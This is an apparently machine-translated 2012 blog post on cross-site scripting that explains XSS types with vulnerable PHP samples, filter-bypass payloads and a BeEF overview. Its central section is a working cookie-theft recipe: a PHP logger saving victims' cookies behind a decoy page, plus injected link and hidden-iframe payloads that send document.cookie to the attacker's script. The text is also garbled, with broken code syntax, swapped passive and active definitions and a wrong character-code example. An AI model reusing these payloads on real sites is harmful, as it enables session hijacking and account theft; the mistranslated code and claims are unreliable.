Cross-site scripting (XSS) manual

Posted: December 4, 2012 in Articles, Glossary
Tags: , , , , ,

Сross Site SсriрtingXSS (Сross Site Sсriрting) – a type of vulnerability of interactive information systems in the network (eg, browsers) that is in server-generated pages embedded scripts that run on the client side.

The specificity of this tactic is that, instead of a direct attack on the server are then used vulnerable server as a means to attack your computer. An attacker can use XSS to bypass access control measures, such as rules limiting the domain. Approximately 80.5% of all recorded in 2007 by Symantec vulnerabilities accounted for by cross-site scripting. Damage from attacks using XSS varies depending on the value of the information processed in the vulnerable site, and the security measures taken by the site owner.

Simply put, XSS, (also known as CSS, which creates confusion with the term ‘Cascading Style Sheets’), is the most common vulnerability occurring among web applications. With XSS an attacker can inject into a Web page with malicious code. XSS is possible because of the lack of validation of data entered by the user, or the lack of filtering. Inadequate handling of user data input may lead to malicious code in the user’s browser.

Danger of XSS

XSS is really dangerous, because using XSS DOM can change the settings on the website. Compromise settings DOM can leak an administrator and therefore compromise your entire website.

What harm can cause an attacker?

– Change settings;
– Steal cookie-files;
– Introduce unwanted advertising;
– Steal data forms to make it more effective cross-site request forgery;
– More, it all depends on the ingenuity of the attacker.

Types of XSS

  • Passive. In this case, either the script is not stored on an affected site, or it can not be automatically executed in the victim’s browser. To trigger passive XSS requires some additional steps you must perform the victim (for example, click on a specially crafted link). Passive XSS is also called ‘XSS first type’.
  • Active. When using active XSS malicious script is stored on the server and works in the browser session when opening a page to an infected site. Active XSS is also called ‘XSS second type’.
  • Through DOM scripting. DOM scripting is through various methods (eg, getElementByID ()) to obtain a login and password.

Consider these types of XSS details.

Passive XSS

Wikipedia describes passive XSS as the most destructive type of attack. Passive XSS is possible when an attacker can embed malicious code on the server that runs in the browser each time you access the original page. A classic example of vulnerability to passive attacks are forums that are allowed to leave comments in HTML format without restrictions.

Thus, the conditions for the implementation of passive XSS occur when developers allow you to save on server user input without proper filtration, and then transfer the data to the user browser.

Sample implementation of passive XSS

Here is a sample code in PHP, which is vulnerable to passive XSS:

<? Php
if (isset ($ _POST [‘btnSign’]))
{
$ Message = trim ($ _POST [‘mtxMessage’]);
$ Name = trim ($ _POST [‘txtName’]);
/ / Process the input value of the variable message
$ Message = stripslashes ($ message);
$ Message = mysql_real_escape_string ($ message);
/ / Process the input value of the variable name
$ Name = mysql_real_escape_string ($ name);
$ Query = “INSERT INTO guestbook (comment, name) VALUES (
‘$ Message’, ‘$ name’); “;
$ Result = mysql_query ($ query) or die (‘<pre>’. Mysql_error (). ‘</ Pre>’);
}
?>

The two parameters in this code – “message” and “name” – not handled properly: the values ​​stored in the table guestbook. Therefore, the return values ​​of these parameters in the user’s browser to execute malicious JavaScript code.

Active XSS

If you believe Wikipedia, the active XSS is by far the most common type of XSS. Active XSS occurs when the data provided by the web client (usually in the HTTP-request or when sending HTML-page), the server uses the same form to generate a response to the user, without pre-treatment.

In other words, the active XSS is possible in those cases where the developer keeps the data entered by the user, without pre-filtering, and then sends the data user’s browser.

Sample implementation of active XSS

Here is a sample code in PHP, vulnerable to active XSS:

<? Php
if (! array_key_exists (“name”, $ _GET) | | $ _GET [‘name’] == NULL | | $ _GET [‘name’] ==”) {
$ Isempty = true;
}
else {
echo ‘<pre>’;
echo ‘Hello’. $ _GET [‘Name’];
echo ‘</ pre>’;
}
?>

As you can see, the parameter «name» can not be processed and returned to the user in response to the same. If the attacker to inject malicious code in a query, the injected code is executed.

Through DOM scripting

Through scripting DOM, according to Wikipedia, it may be due to the presence of vulnerabilities on the client side. Usually scripting is implemented in JavaScript. This type of XSS got its name because it is implemented through the DOM (Document Object Model) – which is independent of platform and language software interface that allows programs and scripts to access the contents of HTML, XHTML and XML-documents, and edit the content, layout and design such documents.

Simply put, a DOM scripting is possible, when a part of JavaScript-code is executed on the client. A typical example is the following situation. Code in JavaScript receives as input the address URL, and then extracts the data using DOM-Location object or gets incompatible with HTML data through a method XMLHttpRequest. The code then uses the data to dynamically generate HTML page on the client side without proper treatment.

An example of a DOM Scripting

Assume that the following code is used to create a form with which the user can select a preferred language. When you use the «default» in the query string will be the default language. The following code shows the situation you describe:

<select>
<script>
document.write (“<OPTION value=1>” + document.location.href.substring
(Document.location.href.indexOf (“default =”) +8) + “</ OPTION>”);
document.write (“<OPTION value=2> English </ OPTION>”);
</ Script>
</ Select>

Page called by the URL as http://www.some.site/page.html?default=French

By sending this URL to the victim can be demonstrated through the scripting DOM: http://www.some.site/page.html?default = <script> alert (document.cookie) </ script>

The handler code is not designed to process that the default setting can contain HTML-markup, and therefore pass it in the same form to the page the user at runtime. Browser gets results page and execute malicious script.

alert (document.cookie)

So, we have discussed all types of XSS. Move on to advanced techniques XSS.

Advanced Techniques

There are several techniques that can protect against XSS. Unfortunately, no protection techniques do not provide an absolute result.

Many of the sites which appear at first glance vulnerable, are quite resistant to XSS filtering methods through the input. Consider some of the input filtering methods.

METHOD 1: replacing <script> null string “”

Below is the code, which, despite the filtering is vulnerable to passive XSS:

<? Php
if (! array_key_exists (“name”, $ _GET) | | $ _GET [‘name’] == NULL | | $ _GET [‘name’] ==”) {
$ Isempty = true;
} Else {
echo ‘<pre>’;
echo ‘Hello’. str_replace (‘<script>’,”, $ _GET [‘name’]);
echo ‘</ pre>’;
}
?>

As you can see from the code, the developer replaces the string «<script>» zero
string of “.”

In the script, verify the compliance of the line «<script>» in lower case. The most common method of bypassing this filter is to replace the line «<script>» line «<SCRIPT>». So, change the case, you can work around the described filtering.

Also, there is another way to get around this filtering:

<script type=text/javascript> alert (“XSS”) </ script>

It is worth noting that the use of alert (“XSS”) for testing XSS undesirable as most of the sites blocking scripts Keyword XSS

METHOD 2: filtering “magic quotes”

With this method, the developer uses filtering so-called “magic quotes”, by using the «addslashes ()» language PHP, which adds a “\” before any special character. Thus, the code is written in JavaScript, will not be executed.

There are several ways to get around this filtering. Will focus on two of them.

The easiest way to get around the filter – do not use quotes. For example, assign a value to a variable, and then execute this variable, which is shown in this code:

<script> var val = 1; alert (val) </ script>

The second method is less trivial. For circumvention second method uses a standard function that takes a numeric value in ASCII-code. A complete table of ASCII-code located at http://www.asciitable.com/. table of ASCII-codes help to write what you want. You can also use a browser add-on Firefox – hackbar. Hackbar addition can be useful when converting from ASCII-code in a numeric value. In this example, the string «XSS» will be presented as “120115115.” So, knowing the numerical values, you only need to know the name of the function converts the numeric values ​​in the ASCII-code. This feature is called «String.fromCharCode ()», using it in this example, it is possible to go without the quotes.

<script> alert (String.fromCharCode (120, 115, 115) </ script>

This code will display our message (in this case – XSS). The above method is very effective in circumvention ‘magic quotes’.

An attacker can steal files-cookies?

At first it may seem that the mechanism of stealing cookies is very difficult to understand and implement, but actually stealing cookies require only minimal programming skills and vulnerabilities XSS, no more.

Scenario steal cookies as follows: first collect_cookie.php script will be created in PHP, which will then be placed on any server hosting company. After that, the code will be implemented in JavaScript, which will steal the cookies and send them to our website. When php-file will get information on cookies, he will keep it in a file stolen_cookies.txt.

To steal the cookies must have three components:

PHP-script to get cookies
JavaScript-code to steal cookies and send them to our website
Company that provides web hosting to place PHP-script
The first component, the script collect_cookie.php

The following is a PHP-script that will be used for the collection of cookies and save them to a file stolen_cookie.txt

<? Php
$ CollectedCookie = $ HTTP_GET_VARS [“cookie”];
$ Date = date (“l ds of F Y h: i: s A”);
$ User_agent = $ _SERVER [‘HTTP_USER_AGENT’];
$ File = fopen (‘stolen_cookie.txt’, ‘a’);
fwrite ($ file, “DATE: $ date | | USER AGENT: $ user_agent | | COOKIE: $ cookie \ n”);
fclose ($ file);
echo ‘<b> Sorry, this site is under construction. </ B> </ br> </ br> Please click <a
href = “http://www.google.com/”&gt; here </ a> to go to the previous page ‘;
?>

Look at what makes this script:

$ CollectedCookie = $ HTTP_GET_VARS [“cookie”];

This line is the conservation value of the variable «cookies» of the GET-request to the variable «collectedCookie»

$ Date = date (“l ds of F Y h: i: s A”);

It is time savings compound, it can determine the time of stealing cookies.

$ User_agent = $ _SERVER [‘HTTP_USER_AGENT’];

Saving user_agent sacrifice for future attacks, if they are needed.

$ File = fopen (‘stolen_cookie.txt’, ‘a’);

This line is the file creation stolen_cookie.txt, that stores information about the stolen cookies.

fwrite ($ file, “DATE: $ date | | USER AGENT: $ user_agent | | COOKIE: $ collectedCookie \ n”);

Storing data in the following format: (“DATE: | | USER AGENT | | COOKIE”)

fclose ($ file);

Close the file

echo ‘<b> Sorry, this page is under construction </ b> </ br> </ br> Please Click <a
href = “http://www.google.com/”&gt; here </ a> to go back to previous page ‘;

Outputs to the screen text (“Sorry, this site is under development”), and links leading to the page google.

The first step is to collect information on cookies over.

The second component: JavaScript-code

The following is a JavaScript-code to be embedded in the server or the victim’s browser. You can implement any of the following scripts:

cookie = ‘+ escape (document.cookie); “href =” # “> Click here for details </ a>

This script requires your response, because displays a link to our site. If the user clicks on the link shown to him, he will get on our website and cookies will be stolen.

<Iframe width = ‘0 ‘height = ‘0’ frameborder = ‘0 ‘
src = ‘<script> document.location =’ http://127.0.0.1/collect_cookie.php?
cookie = ‘+ escape (document.cookie); </ script>’ />

This script does not require any action on your part. In the second case, the victim’s website introduced a hidden IFrame, invisible to the user’s eyes.

As a result, the stolen cookies will be in the file stolen_cookie.txt. Is available at the link below the video showing how to steal cookie-files: http://www.youtube.com/watch?v=ZeLyJnhz4ak

What is BeEF?

BeEF (short for Browser Exploitation Framework) – a platform for the operation of browsers. BeEF used for a variety of attacks on users’ computers to their capture. Having this tool makes your job easier, as many chores already automated.

Since the operation of the capture of zombie computers automated, using the application beef (Browser Exploitation Framework) can capture a lot of zombie computers (so called computers that are inside a botnet).

On the official site BeEF contains the following description of the program.

Operating framework browsers BeEF – a powerful professional tool in the field of computer security. In BeEF implemented last attack methods that are used by specialists in the field of penetration testing with practical experience of attacks on client applications. Unlike other platforms, security, BeEF focused on the exploitation of vulnerable browsers to gain control of the computer. This project is being developed exclusively for the legal research and penetration testing.

BeEF used to capture one or more browsers, allowing you to command a captured computer.

Each browser has its own security context, and each context can provide a variety of attack vectors. The platform allows the specialist in the field of penetration testing to select in real time for each browser-specific module, which uses a simple and powerful API platform BeEF. API is the basis of the effectiveness of the platform, letting aside the subtleties and simplifying development of custom modules.

You can download from the project website BeEF http://beefproject.com/

Additional information about the beef is located at the address below:

https://github.com/beefproject/beef/wiki

Comments
  1. Paleo Diet says:

    Everything is very open with a very clear
    clarification of the issues. It was definitely
    informative. Your site is very helpful. Many thanks for sharing!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s